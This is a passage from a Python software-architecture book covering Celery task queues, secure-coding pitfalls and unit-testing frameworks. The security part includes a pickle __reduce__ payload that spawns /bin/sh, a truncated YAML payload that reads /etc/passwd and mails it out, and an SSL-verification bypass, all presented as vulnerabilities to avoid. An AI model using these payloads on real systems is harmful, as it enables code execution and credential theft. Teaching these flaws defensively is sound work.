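As a quick aside before moving on to Celery, the following is a minimal sketch of publishing a message to RabbitMQ from Python, assuming the pika client library is installed and a broker is running on localhost:

import pika

# Connect to a RabbitMQ broker running locally
connection = pika.BlockingConnection(
    pika.ConnectionParameters(host='localhost'))
channel = connection.channel()

# Declare a queue and publish through the default exchange,
# using the queue name as the routing key
channel.queue_declare(queue='task_queue', durable=True)
channel.basic_publish(
    exchange='',
    routing_key='task_queue',
    body='process order #42')

connection.close()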

Celery – a distributed task queue

Celery is a distributed task queue created in Python. Single units of execution in celery are referred to as tasks – which can be run in a parallel manner on one or more machines in the network using the worker processes. The default technique for achieving this in celery is multi-processing, but it also allows you to configure a custom backend.

You can execute the tasks in a synchronous or asynchronous manner, and the output is available in the form of a future-like object in most cases. You can also connect it to databases, files, or in-memory Redis caches, and the output from the task can be written directly to these.

Compared to other message queues, the units of data are not simply messages – rather, they are executable tasks, referred to as callables in Python.

You can interface Celery to work with the different message brokers – the out-of-the-box broker is RabbitMQ. You can also configure it to use a Redis in-memory cache as the broker backend.
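A minimal sketch of such a setup, assuming a Redis broker running locally (the module and task names here are illustrative):

# tasks.py
from celery import Celery

# Use Redis as both the broker and the result backend
app = Celery('tasks',
             broker='redis://localhost:6379/0',
             backend='redis://localhost:6379/0')

@app.task
def add(x, y):
    return x + y

A worker can then be started with celery -A tasks worker, and add.delay(4, 5) submits a task whose result can later be fetched from the returned AsyncResult with .get().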

So, when should you use celery? Celery is useful in scaling a task over multiple worker nodes located on several host machines; it is a good fit for scaling computationally intensive tasks. It can receive messages from queues and send them across to machines in a distributed cluster, thereby achieving horizontal scalability. An example of this would be an email delivery infrastructure. It can also perform parallel computations by simply dividing the data into multiple segments and applying a compute function on it.

Let us look at how and when to use celery, with the help of some practical examples and guides.

A celery example

The most common use case for celery that I have come across in my experience so far is Email Delivery Systems. Let us write a quick example in Python to see how such a system can be written using Django as the web application framework:

from django.conf import settings
from django.core.mail import send_mail
from django.template import Engine, Context

from .celery import app as celery_application

def render_from_template(template, context):
    eng = Engine.get_default()
    tmpl = eng.get_template(template)
    return tmpl.render(Context(context))

@celery_application.task
def task_send_mail(to_list, subject, mail_templ, context):
    msg = render_from_template(f'{mail_templ}.txt', context)
    msg_html = render_from_template(f'{mail_templ}.html', context)
    send_mail(
        from_email=settings.DEFAULT_FROM_EMAIL,
        recipient_list=to_list,
        subject=subject,
        message=msg,
        html_message=msg_html,
        fail_silently=False,
    )

In the preceding snippet, the usage of celery to deliver the mail will help reduce the response time of the application, since the sending logic is decoupled, as a celery task, from the main code that provides a response back. You can use the delay method of the celery app to invoke this.

task_send_mail.delay(…)

The celery app can also help with something like automated retrying upon failure.

@celery_application.task(bind=True, default_retry_delay=2 * 60)
def task_send_mail(self, to_list, subject, mail_templ, context):
    …
    try:
        send_mail(
            …
        )
    except smtplib.SMTPException as ex:
        self.retry(exc=ex)

With the preceding change, if the email could not be sent, the program will wait for two minutes and retry sending the mail. The retry count is also configurable.

Running scheduled tasks with Celery

You can use celery to schedule tasks to be run periodically, much like crontabs in Linux. To achieve this functionality, the celery worker on the machine needs to be executed with the --beat flag, without which the scheduler will simply be ignored by celery. We can then configure the task to be executed and the time at which it should be triggered – the config file would look something like the following:

from datetime import timedelta
from celery.schedules import crontab

CELERY_BEAT_SCHEDULE = {
    'EOD-stats-summary': {
        'task': 'proj_name.data.scripts.send_eod_stats',
        'schedule': crontab(
            minute='*/30',
            hour='1, 3, 8-20, 22'
        ),
    },
    'quota-usage-notify': {
        'task': 'proj_name.utils.scripts.notify_quota_usage',
        'schedule': timedelta(minutes=6),
    }
}

Note that this configuration is specific to the application we are building with Django. If you are using a different framework, you can also define a generic configuration in the celery app config itself, using the following:

celery_application.conf.beat_schedule = …

It also supports the addition of arguments to the tasks and provides the ability to schedule the same task with multiple arguments. You can provide fixed times or simply use the syntax that you use with a cronjob.

Ability to postpone task execution

Celery queue tasks can be configured to run after a fixed delay period or timeout. This is particularly useful in scenarios where you want a delayed response to an action that just took place. This is achieved with the help of the apply_async function, providing it with an eta or countdown parameter.

eta: Provides the exact time at which to trigger the task.

countdown: Provides after how many seconds to trigger the task.

Using it in your configuration code would look something like the following:

task_func.apply_async(
    # Arguments to Task
    (param1, param2, … , paramN),
    # Trigger after 10 minutes
    countdown=10 * 60
)

Set up multiple Celery queues

If your application works in a distributed environment, you will have several workers running on different machines – however, you would usually share a single message queue.

However, additional queues can be set up for the tasks or workers that need more performance. Consider the example of sending emails that we discussed earlier – we do not want our emails to be hindered by the other tasks in the queue. Hence, a dedicated queue can be set up for handling only the emails (say, mail_q):

CELERY_TASK_ROUTES = {
    'project_name.utils.mail.task_send_mail': {'queue': 'mail_q'},
}

For the non-Django projects, you can specify the queue directly in the configuration of the application, using the following:

celery_application.conf.task_routes = …

Then, we can bring up two different workers, using two different queues, in the following way:

celery -A project_name worker -l info -Q celery
celery -A project_name worker -l info -Q mail_q

If we run a worker without the -Q argument, that worker will serve the default queue and handle all the other non-email tasks.

Long running tasks with Celery

In the data science domain, we sometimes write and run processes that churn terabytes of data to generate analytical stats. With growing data sets, the runtimes of these programs keep increasing. The recommended way of writing such tasks is to process the data in chunks. We can introduce limit and offset parameters in the tasks to define the chunk size to be used per task.

@celery_application.task
def send_email_task(offset=0, limit=100):
    recipients = (Recipients.objects
                  .filter(is_active=True)
                  .order_by('id')[offset:offset + limit])

    for recipient in recipients:
        send_email(recipient)

    if len(recipients) >= limit:
        send_email_task.delay(offset + limit, limit)

This trivial example illustrates how the limit and offset can be used. When a task completes for a chunk of recipients, we check whether there are more recipients available, and if so, the task is triggered again with an updated offset. Otherwise, the last chunk has been encountered and the task terminates. This does assume that the ordering of the data is fixed during the execution.

Application security

Security architecture

When we talk about application security, we refer to software that implements a proper access control mechanism, allowing only authorized users to view and manage the data and APIs, while keeping out malicious attempts at access by unauthorized users. The widely accepted paradigm for creating any kind of system implementing information security includes the following principles:

Confidentiality: This makes sure that the information or the critical data is not accessed or modified by unauthorized users. This is typically achieved with a set of rules and procedures that enable access and keep track of the application users.

Integrity: Integrity is about ensuring that the system is not susceptible to external influences or manipulations. It ensures that the data across all components and channels is reliable and trustworthy.

Availability: This ensures that for all the valid and authorized users, the SLA for the system is honoured and no one is denied access to the services when needed. The preceding components are referred to, commonly, as the CIA triad, and they constitute the foundations of a secure architecture design of a system. These are usually coupled with a few of the following additional traits that need to be kept in mind:

Authentication: The likes of digital signatures and public keys ensure that the identities of users are validated. It makes sure that the people are actually who they say they are.

Authorization: What is a valid user allowed to do? Authorization ensures that the different users can be provided the different roles in an application; for example, read and write users in a database.

Non-repudiation: This ensures accountability of transactions. When a user performs an action, they cannot deny it later. For example, emails sent and bank transactions, once done, cannot be denied.

Figure 9.11: The CIA triad of application security

Common vulnerabilities

It is not easy to write secure code. When we are taught how to code in a programming language, the instinct is to think how the clients want to use the program or software. When designing secure applications, the direction should be to think of how it could be misused and broken by the users. The same applies to Python applications – in fact, there are several such cases of vulnerable code in the Python standard library. However, many developers are not aware. In this section, we will be looking at some of the most common kinks in Python code that can make your applications vulnerable.

Assert statements in production code

Sometimes the developers use assert statements as a means to check and prevent the users from accessing a section of the code. That is not just a sub-optimal practice, but also a security flaw. Consider the following example:

def do_something_important(request, loginname):
    assert loginname.is_admin, "You are unauthorized!"
    # sensitive code…

When you run this in a shell, the default behaviour of Python is to run the program with __debug__ set to True. However, when we deploy an application onto a production environment, we want to squeeze out some additional performance using optimizations. This will cause the assert statement to not be executed at all, and any logged in user, regardless of whether they are an admin or not, will be able to access the sensitive code.

Only use assert statements to communicate with the other developers, such as in the unit tests or to warn against the incorrect API usage, never for access control.
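A minimal sketch of the safer alternative – an explicit check that raises an exception and therefore survives optimized runs (python -O strips assert statements) – assuming the same hypothetical loginname object:

def do_something_important(request, loginname):
    # An explicit check is evaluated even when Python runs with -O
    if not loginname.is_admin:
        raise PermissionError("You are unauthorized!")
    # sensitive code…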

Timing attacks

How can something as simple as comparing two strings be vulnerable? Let us see. The code to compare the strings would be equivalent to the following:

def equals(string_one, string_two):
    # Size Check
    if len(string_one) != len(string_two):
        return False
    # Character Wise Check
    for char_one, char_two in zip(string_one, string_two):
        if char_one != char_two:
            return False
    return True

We perform a character wise comparison until the first point of difference is identified. Depending upon how long our strings are, the time taken will linearly increase.

Now, think about authenticating the secret keys over a network using comparison techniques. In such scenarios, other than the comparison time itself, the network jitter also plays a big role. Timing attacks are what we refer to the situations where the attacker can access or control the values that are compared to the secret.

For example, in the case of an authorization key, if the attacker finds out that the first character in the key is d, then they can start sending keys beginning with d to get an idea of the next character. They can assess the time it takes for each comparison, and the one that takes more time to get rejected is a closer match, since the comparator might have moved on to the next character before failing. Isn't that something you missed?

In order to avoid timing attacks, a very obvious solution is to use string comparison techniques whose running time does not depend on how much of the strings match. Such algorithms are referred to as constant time string comparisons.

Today, there are several built-in functions available for such alternative comparisons, depending upon the environment you are using. For example, the Python standard library in Python 3.3+ ships the hmac.compare_digest function for this purpose. If you are using Django, you can rely on the constant_time_compare function it provides.
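A quick sketch of its usage (the token values here are just placeholders):

import hmac

expected_token = "s3cr3t-api-key"
provided_token = "s3cr3t-api-kex"

# The comparison time does not leak where the strings first differ
if hmac.compare_digest(expected_token, provided_token):
    print("Access granted")
else:
    print("Access denied")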

XML parsing

Most of the applications I have seen in scaled up organisations are built in a rapid manner, and therefore rely on a lot of standard modules and libraries. Chances are that if you use the standard XML Python modules for loading and parsing XML data, your application is susceptible to a few attacks through XML. The most common attacks include Denial of Service for crashing the client systems. Especially, if your application is parsing external, untrusted XML files, it increases the odds. A very common example of such an attack, which we used in our younger years as pranks or just to sound cool, was called the billion laughs. It hides about a billion LoLs as a payload in a few lines of XML code using referential entities. When your XML parsers try to read this seemingly harmless file into memory, it will end up consuming several GBs of RAM. Try it out for yourself.

Figure 9.12: Billion Laughs XML Bomb

The fun thing is that Microsoft’s Word, which was being used to draft this content, is XML based, so when trying to paste the code from a text editor to Word, it shoots up the memory usage and crashes, since it tries to parse it, hence the preceding screenshot.

Another common attack on XML parsers would be referencing the entities from the external URLs. This leaves your application vulnerable to attackers who can send across malicious content to be executed when you try to parse the XML code, if you are connecting to untrusted IP addresses.

The problem also sometimes arises when we depend on external, third party libraries that are not robustly implemented, leaving your application vulnerable through no mistake of yours. The Python standard library has a collection of modules like etree, xmlrpc, DOM, and so on, which at some level are still susceptible to these types of XML attacks. Even the official Python documentation keeps a record of such vulnerabilities, at the following link: https://docs.python.org/3/library/xml.html#xml-vulnerabilities

A safer option is to use defusedxml as an alternative to the standard library modules. It adds safe-guards against most of these types of attacks.
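A minimal sketch of the safer parse, assuming the defusedxml package is installed and an untrusted.xml file on disk:

import defusedxml.ElementTree as ET

# Raises an exception instead of expanding malicious entities
tree = ET.parse("untrusted.xml")
root = tree.getroot()
print(root.tag)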

A polluted site-packages or import path

You can import anything anywhere – Python provides a ton of flexibility to its import system. It gives a tremendous advantage when you are just cooking up some scripts or monkey-patches for automation or testing. However, the same feature can also prove to be one of the major security holes in Python.

Most of us install and rely upon third-party packages in our local deployments or virtual environments, which exposes us to security vulnerabilities in those packages. There have been several instances of packages being published to PyPi that have names similar to some of the popular packages. Developers can mistake the package names and install the ones that have malicious code in them. For example, there have been packages with names that sound similar to well-known ones, which can easily confuse the user.

The dependencies of the packages being installed can also introduce vulnerabilities, for instance by overriding default behaviour in Python through the import mechanism.

Try to vet 3rd-party packages. The features and security services of PyUp.io can be useful. It is recommended to use virtual environments for production applications, so that the global site-packages remain pristine. Do check the package signatures.

Pickle mess-ups

A Python pickle file can store any object in a serialized manner. Deserializing them is as risky a behaviour as parsing untrusted XML or YAML. One such vulnerability arises when we pickle classes that define a __reduce__ magic method returning a string, or a callable within a tuple. Attackers can use such syntax to introduce malicious code using the subprocess module to run arbitrary commands on the target machine. Consider the following example of pickling code that runs a shell command:

import base64
import pickle
import subprocess

class ExecuteBinSh(object):
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh',),))

print(base64.b64encode(pickle.dumps(ExecuteBinSh())))

Only unpickle data from sources you trust or authenticate. Alternatively, you can use a different serialization pattern like JSON.

Using yaml.load safely

The PyYAML library documentation already included a warning message for the users regarding its vulnerabilities. It goes like the following:

“Warning: It is not safe to call yaml.load with any data received from an untrusted source. yaml.load is as powerful as pickle.load and so may call any Python function.”

For example, consider the Ansible module in Python, which illustrates how one can give Ansible Vault a valid YAML payload as an input value. When the value is loaded, the embedded os.system call can run on the host.

!!python/object/apply:os.system ["cat /etc/passwd | mail

This can effectively steal local sensitive information and send it to the attacker. Hence, if you are loading user-specified YAML configs, you are exposed to malicious attacks.

The recommendation is to use yaml.safe_load in most cases, unless the full loader is strictly required, as it provides built-in protection against such attacks.
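A quick sketch of the safer call, assuming PyYAML is installed:

import yaml

config_text = """
database:
  host: localhost
  port: 5432
"""

# safe_load only constructs plain Python objects (dicts, lists, scalars)
config = yaml.safe_load(config_text)
print(config['database']['host'])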

Handle requests safely

Most of the common applications that my team works on use the requests module to interact or fetch content from the remote HTTP endpoints. It is a wonderful tool, which also has support for verifying the SSL certificates for you.

The requests module uses certifi to ensure that the certificate authorities are reliable and trustworthy. Hence, you should always try to secure your remote connections by keeping the latest version of the certifi dependency.

However, with all the advantages it provides, it also makes it possible to bypass SSL validation if the user does not want it. The default behaviour, however, is to verify the certificate. When reviewing code, ensure that developers do not explicitly violate this rule, unless the source is internal or completely trusted.

Bypassing the verification of SSL certificates can be simply achieved with a single argument value:

requests.get("https://www.sonalraj.com", verify=False)

Using bandit for vulnerability assessment

Over the years of developing Python infrastructures, we have started trusting the bandit library to scan our codebase for vulnerabilities. Bandit is an open-source project and is available for installation through PyPi.

The bandit module will create an AST (abstract syntax tree) for each Python file that it scans in the project, and then run several different plugins against this AST to detect common security issues in the software. For example, it includes plugins that can figure out if you have forgotten to remove the debug=True flag from your Flask application.

You can manually run Bandit against your code, or choose to integrate it with git-hooks for your repository, or even include it as a step in your CI/CD pipeline for assessing code before deployment to the test or production environments. The setup involves the creation of a YAML configuration file in which we can define and control how bandit acts in different situations. It also provides an option to skip certain tests if you want a relaxed check for your codebase. Despite the vast number of plugins that are run against the code, there is still a limit to how much of a guarantee bandit provides for vulnerability free code. There could still be potential issues that are not identified by any of bandit's plugins. However, adding it to your code quality assessment tasks does get most of the job done in an easy way.
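A typical invocation scans a project recursively (the path and configuration file names here are placeholders):

# Scan all Python files under the project directory
$ bandit -r path/to/project

# Skip selected tests or read settings from a configuration file
$ bandit -r path/to/project -s B101 -c bandit.yaml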

Other Python tools for vulnerability assessment

Python code is relatively secure by default. However, one should still be considerably sceptical of it. Even the way multiple people in the firm contribute to the development of an application can introduce unwarranted security issues. Hence, having a security scanner helps to find the vulnerabilities in the code, if any. Several online security scanners are available for online threat assessment. However, for platform dependent weaknesses in Python, we need more specialized tools. In this section, we summarize some of the effective tools we have evaluated and used over the years, in the following table:


Table 9.3: Common Vulnerability assessment tools in Python

Python coding security strategies

We have now covered how we should architect our applications for better performance, enhanced security, and reduced vulnerability. Finally, let us discuss and summarize some coding strategies with which security architects can promote a culture of clean, robust, and secure Python code. These can help avoid security flaws or bugs, even at the conception and design phases of application development. The following are some of the strategies we emphasize:


Table 9.4: Coding Strategies for robust and secure Python code

Conclusion

No matter how fast a car can go, it is not going to be a safe ride if it is not built and designed well. Relevant design patterns and architecture help build a solid foundation for robust Pythonic applications in production. Working with clean design patterns is more of an art, one that makes you more intuitive over time – it becomes easier to decide what to do and not do in a particular situation while architecting an application. When creating solutions focused around good design patterns, we actually solve the problems at a more general level, closer to the high-level design.

In this chapter, we looked at what the Pythonic design patterns and their nuances are, and how we can decide upon an appropriate application architecture. We also looked at the event driven architectures and how they fare in comparison to the Microservices and Pipe & Filter architectures. We touched upon some of the best practices for scaling Python applications and trivia for secure application development.

In the next chapter, we will be taking a detailed look into what the different ways of testing our Python code are and ensure that the production environments are bug-free and sane.

Key takeaways

When creating global assignments for methods, it is always a good idea to explicitly define the assignments stacked on separate lines.

There are no NULL pointers in Python. Every name is always guaranteed to hold a valid address. Before creating a generic solution, remember the rule of three – when you encounter three or more instances of the same problem that need to be addressed, only then come up with a required abstraction.

Microservices are more of a design philosophy.

In the Pipe and Filter Architecture, pipes are parent and child connection pairs. Whatever is passed on at one end of the communication can be viewed at the other end and vice-versa.

Asynchronous techniques of programming refers to the main application thread outsourcing smaller units of work to run separately. Generators produce data for iterations. Coroutines can consume data as well.

Event loops distribute and manage the task execution, by registering and managing the control flow between them.

Reducing coupling between systems helps to scale the systems well. Keeping two systems tightly coupled does not allow them to scale beyond a certain limit.

A message queue is a larger version of the multi-threaded synchronized queue, where the threads are replaced by individual machines, and the in-process queue is replaced by a distributed shared queue.

Only use assert statements to communicate with other developers, such as in unit tests or to warn against incorrect API usage, never for access control.

Further reading

Fredrik Lundh, Default Parameter Values in Python

Ian Bicking, The Magic

Flavio Curella, Sentinel values in Python

Kenneth Reitz, Repository Structure and Python

Scott A. Crosby, Dan S. Wallach, Rudolf H. Riedi, Opportunities and Limits of Remote Timing Attacks, Rice University

CHAPTER 10 Effective Testing for Python Code

“Don’t ever take a fence down until you know why it was put up.”

— Robert Frost

The foundation of professional software development lies in following effective testing practices. Everything we have been discussing in the course of this book has been towards a common goal of writing cleaner and more maintainable professional applications. Writing automated tests contributes towards enhancing the quality of the code.

From personal experience, most novice developers working on production code think about improvements in logging and test coverage, only when something breaks in production. Proactively thinking and working around these will help to ensure better tracking of errors and timely bug fixes.

Structure

In this chapter, we will be taking a deep dive into the rich set of features in Python and the best practices that one should follow in effectively testing code. The key areas include the following:

Types of testing and choosing test frameworks

Writing effective assertions

Advanced multi-environment testing

Writing automated tests and mock objects

Best practices to be followed in Python testing

Objectives

Pythonic code is terse and simple to read and understand. Python developers usually pursue techniques for getting results quickly, with less focus on the organisation of code. This works for rapid prototyping and scripts, but for large scale software, it could lead to several iterations of bug fixes. The same rule applies to your test code as well. At the end of this chapter, you will be able to do the following:

Familiarize yourself with the capabilities of different testing tools and frameworks.

Understand how to write effective assertions and features of test-driven development.

Create and use mock objects.

Structure your test code effectively and follow best practices in tests.

How unit tests compare with integration tests

Testing is derived from everyday experiences – consider a situation where you need to check whether the lights on your vehicle are working or not. The first step – the test – would be to turn on the lights. The next step – the assertion – would be to step out of your vehicle and check whether the lights are switched on. This, in the world of programming, would be referred to as a unit test.

Similarly, if you pick up one component of the vehicle at a time, the brakes, the wheels, the engine, and so on, and check whether they are working fine, they will together form the equivalent of an Integration test.

A software application has several components, small or large, that fit together to form a working entity – these may include functions, classes, or even modules. Integration Testing is useful, but when a failure is detected, it becomes difficult to pinpoint the exact problem. With a similar example, let's say you try starting your car but it doesn't start – that is a failed integration test. You still do not know what exactly has gone wrong. If you drive a modern high-tech car, it will alert you that you need an oil change. This is done using a unit test.

Unit tests usually check the operations of a single component of the application for a small unit of work. They help to pinpoint and isolate issues with the application faster and ensure a quick fix. Integration Tests, on the other hand, verify that the application as a whole works fine and that the individual components get along with each other internally.

Python lets you write both unit tests and integration tests. Say you want to unit test a product function – you would provide a set of known inputs and check against a known result. Try running the following on the interpreter:

>>> def prod(a, b):
...     return a*b
...
>>> assert prod(12, 10) == 120, "Should be 120"

When the assertion passes, there is no output on the console. If the result is different, the assertion fails with an AssertionError and the message is printed on the console.

>>> assert prod(12, 10) == 62, "Should be 120"
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AssertionError: Should be 120

Now that you have tested this on the interpreter REPL, you can start building a test script as a Python file.

def test_prod():
    assert prod(12, 10) == 120, "Should be 120"

if __name__ == "__main__":
    test_prod()
    print("All tests have passed.")

This test script is constituted of three main components – the test case, the assertion, and the entry point of the test. It can now be run standalone on the command line.

$ python test_math_lib.py
All tests have passed.

If all your code had unit tests for every task, where the error and expected results are written to the logs or the console, debugging would become a breeze. As the application scales, there might be several such failure cases encountered, and it becomes increasingly difficult to manage them. That paved the way for Test Runner suites. A Test Runner is an application designed to execute test suites and report their results, helping to diagnose failures.

Choosing a Test Runner

With rapidly growing adoption, several test runners have been developed for Python. The standard library has a built-in test runner which is referred to as unittest. We will be discussing more details about unittest and its usage in the following section; however, one thing to note is that its basic operating principles are compliant with other testing frameworks. Some of the popular testing frameworks are as follows: unittest

nose2

pytest

In this section, we will be discussing what the differences between them are, and how one can select the best possible option as per their use case.

unittest

Since Python 2.1, the unittest library comes bundled with the Python core itself. It is widely used in open source and commercial Python application development processes. The unittest library is constituted of a test runner as well as a unittest framework. The basic requirements for writing tests using this library are as follows:

The tests should be methods and part of a test class. The built-in assert statement can be used – but more specialized assertion methods are available in the TestCase class of the unittest library.

Let’s try converting the simple test case that we had discussed earlier for the prod() method we defined. The unittest version would look like the following:

import unittest

class TestProd(unittest.TestCase):
    def test_prod_diff(self):
        self.assertEqual(prod(12, 10), 120, "Should be 120")

    def test_prod_same(self):
        self.assertEqual(prod(12, 12), 120, "Should be 144")

if __name__ == '__main__':
    unittest.main()

Running this on the command line invokes the two test functions and we notice one successful and one failed test case:

$ python test_unittest.py
.F
=====================================================
FAIL: test_prod_same (__main__.TestProd)
-----------------------------------------------------
Traceback (most recent call last):
  File "test_unittest.py", line 9, in test_prod_same
    self.assertEqual(prod(12, 12), 120, "Should be 144")
AssertionError: Should be 144
-----------------------------------------------------
Ran 2 tests in 0.005s

FAILED (failures=1)

Note that for Python 2.7 and below, the backport of the newer unittest features is distributed as a separate unittest2 package. This might lead to confusion between the two if the correct name is not imported.

Nose2

With a growing number of tests, unittest scales well. But the output of the assertions is not the simplest to analyse in a large test suite, especially if there are multiple failures.

The nose2 library has all the features of the unittest framework. In fact, you can run the unittest scripts out of the box, without any changes, using nose2. It adds additional functionality to make the test run process easier. Running nose2 from the command line automatically detects the unit tests defined, as long as the test scripts follow the test-prefixed naming convention (such as the test_unittest.py file used here). The test cases in the working directory need to inherit from the unittest.TestCase class.

$ python -m nose2
.F
=====================================================
FAIL: test_prod_same (__main__.TestProd)
-----------------------------------------------------
Traceback (most recent call last):
  File "test_unittest.py", line 9, in test_prod_same
    self.assertEqual(prod(12, 12), 120, "Should be 144")
AssertionError: Should be 144
-----------------------------------------------------
Ran 2 tests in 0.005s

FAILED (failures=1)

We were able to execute the same test as the previous one, using nose2. Nose2 is an advanced test runner built on top of unittest. Some of the salient features of nose2 are as follows:

Supports advanced features like file-based configuration, loading different plugins, or writing a customized test runner.

Unlike unittest, nose2 enables you to run specific test cases on the command line, enabling you to test with multiple inputs.

The directory in which nose2 looks for the test files can be changed using command line arguments, enabling you to modularize your testing to specific features of the application.

nose2 does not consist of a testing framework. It is merely a test runner which has high compatibility with the unittest testing framework.

pytest

The pytest framework is by far one of the best testing frameworks in Python. Not only is its syntax very simple, it is also capable of handling increasingly complex testing requirements.

The test cases in pytest are simply a series of functions in the test script whose names begin with the prefix test_. Some of the features provided by the pytest suite include the following:

Dynamic filtering of test cases to run.

Ability to rerun the suite from the last failing test case.

Support for the native assert statement.

A collection of several plugins which extend the testing functionality.

If we were to rewrite the TestProd case from earlier, it would look like the following:

def test_prod_diff():
    assert prod(12, 10) == 120, "Should be 120"

def test_prod_same():
    assert prod(12, 12) == 120, "Should be 144"

There is no TestCase class to inherit from, no compulsion to use classes at all, and no need for a command line entry point in the test script. Just define your test cases and you are ready to go.

Pytest is a high performance framework, which can test almost everything – from basic Python scripts to client APIs, User Interfaces, and even databases. It also provides support for testing the methodologies corresponding to the unittest framework, but offers a hassle-free syntax for easily creating tests.
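As a quick illustration of how little ceremony pytest needs: it is distributed on the Python Package Index, and once installed, running the bare pytest command discovers files named test_*.py (or *_test.py) in the current directory and below and executes every test_ prefixed function in them.

$ pip install pytest
$ pytest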

Structuring a simple test

Tests are important, but before we start writing one, we need to be sure about a couple of things:

What component or part are you writing a test for?

Would you consider a unit test or an integration test?

The fundamental structure of a test can be represented in the following chart:

Figure 10.1: Structure and Flow of a Test

Consider the example of the prod() function that we discussed in the previous section. There are several different cases that we would want to check:

Can it take a list of values as input?

Would it work with a set or tuple or even floats?

What would the function do if we entered a string as input?

Does it behave well with negative inputs?

Once you have clearly defined these aspects, you can convert each of these scenarios into a test case having one or more assertions.

The SetUp and TearDown methods

Sometimes there is preparation that needs to be done before the test suite is run, for example, initializing some objects or establishing connections. A similar exercise might be needed once the tests have completed execution, for the purpose of cleanup or reporting of results. The unittest framework in Python comes bundled with the setUp() and tearDown() methods, which are automatically called before and after each test respectively. Consider the following example:

# Assume that my_series is an API to be tested which simply returns
# the next item in a series

import unittest
import my_series

class TestSeries(unittest.TestCase):

    def setUp(self):
        self.elements = [0, 1, 1, 2, 3, 5, 8, 13]
        print("setUp completed!")

    def testSeriesComputation(self):
        for i in range(0, len(self.elements)):
            self.assertEqual(
                my_series.compute_next(i),
                self.elements[i])

    def tearDown(self):
        self.elements = None
        print("tearDown completed!")

if __name__ == "__main__":
    unittest.main()

Now, when you try to run this code, you will see the following result:

$ python3 fibonacci_unittest2.py
setUp completed!
tearDown completed!
.
-----------------------------------------------------
Ran 1 test in 0.000s

Notice that we never explicitly called the setUp and tearDown methods but the unittest suite automatically executes them for every test if you have defined either of them.
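As an aside, and not shown in the snippet above, unittest also provides the setUpClass() and tearDownClass() class methods, which run once per test class instead of once per test. A minimal sketch, with a purely illustrative shared_data resource:

import unittest

class TestWithSharedSetup(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        # Runs once before any test in this class; useful for
        # expensive preparation shared by all tests
        cls.shared_data = list(range(1000))

    @classmethod
    def tearDownClass(cls):
        # Runs once after all tests in this class have finished
        cls.shared_data = None

    def test_shared_data_length(self):
        self.assertEqual(len(self.shared_data), 1000)

if __name__ == "__main__":
    unittest.main()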

Writing assertions

In the final step, you need to implement your assertions, which validate whether the results match some known response. Some widely followed best practices for writing assertions include the following:

Tests need to be deterministic in nature, that is, they should return the same results regardless of how many times they are run.

Test cases should be modular, which means that the assertions in a test case should only be relevant to that test case.

In pytest, you can simply use the built-in assert statement; although, you could also use the set of pre-configured assertion methods that come bundled with the unittest library. Some of the useful and common methods include the following:

.assertEqual(a, b): checks that a == b
.assertNotEqual(a, b): checks that a != b
.assertTrue(x): checks that bool(x) is True
.assertFalse(x): checks that bool(x) is False
.assertIs(a, b): checks that a is b
.assertIsNone(x): checks that x is None
.assertIn(a, b): checks that a in b
.assertIsInstance(a, b): checks that isinstance(a, b)

Table 10.1: Pre-defined unittest assert methods

Methods like .assertIs() and .assertIsNone() have their complement methods in the library as well – .assertIsNot() and .assertIsNotNone(), for example.

I usually prefer using these built-in methods as they make the use case clear for those reading the code, in comparison to writing generic assert statements and figuring out the purpose from the code.

Do not forget to test side effects

Testing is not just about comparing return values of a function or class. More often than not, running a code snippet changes things in the application environment, which might include the class attributes, database contents or even stored files.

We consider these as side effects, and they should be covered by your test suite. If you find associated side effects, you can include them as assertions. However, keep in mind that if a test has many side effects, the code could be violating the Single Responsibility Principle, which says that your unit should implement a single functionality. In that case, your code would need refactoring, as it is doing too many things. This ensures that your code follows a good design principle, and that you have simple and deterministic tests for complex applications.
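To make this concrete, here is a minimal sketch of asserting on a side effect rather than on a return value; the Counter class is a hypothetical example, not something defined earlier in the chapter:

import unittest

class Counter:
    """A hypothetical unit whose increment() changes object state."""
    def __init__(self):
        self.count = 0

    def increment(self):
        self.count += 1

class TestCounterSideEffect(unittest.TestCase):
    def test_increment_updates_state(self):
        counter = Counter()
        counter.increment()
        # The assertion targets the side effect (the mutated attribute)
        self.assertEqual(counter.count, 1)

if __name__ == "__main__":
    unittest.main()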

Web framework tests for Django and Flask applications

Web applications follow slightly different designs than packaged applications, and writing tests for them has some critical differences in how the tests are written and run.

Web applications are made of several moving components that interact with each other. Be it the models, views, controllers, or routing code, depending upon which Web Framework is being used, it might need to be tested with a detailed knowledge of the framework.

As an analogy, consider the vehicle example we discussed at the beginning of the chapter. To test whether the engine of the vehicle works fine, you need to make sure that the battery is active and the onboard computer is turned on.

The most common Web Frameworks like Flask and Django already provide the unittest based frameworks for writing their specific test cases. So, you can use the same principles of writing tests, with minor differences.

Using the Django Test Runner

When you create a Django application template, a test file will already be created inside the application directory with the name tests.py. In case it is not generated for your application yet, you should create the file and add the following snippet:

from django.test import TestCase

class CustomTestClass(TestCase):
    # Add test methods
    pass

In the case of Django applications, your test class has to inherit from django.test.TestCase instead of using the TestCase class from unittest. Setting up the test suite with this API ensures that all the web application configurations are automatically set up by Django's TestCase class.

To run the test in Django, you use the application’s own manage.py file to trigger the test run:

$ python manage.py test

Note that if your application is large and complex, you will need multiple test scripts. So instead of a tests.py file, you should create a tests folder and place an __init__.py in it to convert it into a test module. Place all your test scripts with the 'test_' prefix in the directory and Django automatically discovers them for runs.

Using Flask with Unittest

For Flask applications, you will need to import the app and ensure that the test mode is enabled. A test client can be instantiated and used to send requests to the routes defined in the application. The instantiation of the test client in Flask is done in the setUp method of the test we define (the setUp method is discussed in detail in its own section of this chapter). Consider the following example of a demoFlaskApp to illustrate this:

import unittest
import demoFlaskApp

class demoFlaskAppTest(unittest.TestCase):
    def setUp(self):
        # Enable Test Mode
        demoFlaskApp.app.testing = True
        self.app = demoFlaskApp.app.test_client()

    def test_home_page(self):
        result = self.app.get('/')
        # Update assertions here

The test cases can then be executed from the command line with the help of the following command:

python -m unittest discover
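For illustration, the assertions in test_home_page could check the status code of the response returned by the test client. This is only a sketch and assumes that demoFlaskApp defines a '/' route that responds successfully:

import unittest
import demoFlaskApp

class demoFlaskAppStatusTest(unittest.TestCase):
    def setUp(self):
        demoFlaskApp.app.testing = True
        self.app = demoFlaskApp.app.test_client()

    def test_home_page(self):
        result = self.app.get('/')
        # The test client returns a response object whose status_code
        # attribute can be asserted on
        self.assertEqual(result.status_code, 200)

if __name__ == '__main__':
    unittest.main()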

Some advanced testing Gotchas

